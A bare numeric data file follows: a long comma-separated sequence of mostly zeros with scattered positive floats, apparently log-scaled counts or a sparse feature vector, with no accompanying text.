0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 7.3792124757492905, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0, 3.4825185607408002, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.6109179126442243, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 2.4849066497880004, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.666426688112432, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 2.5649493574615367, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.662960480135945, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 9.887510598012987, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 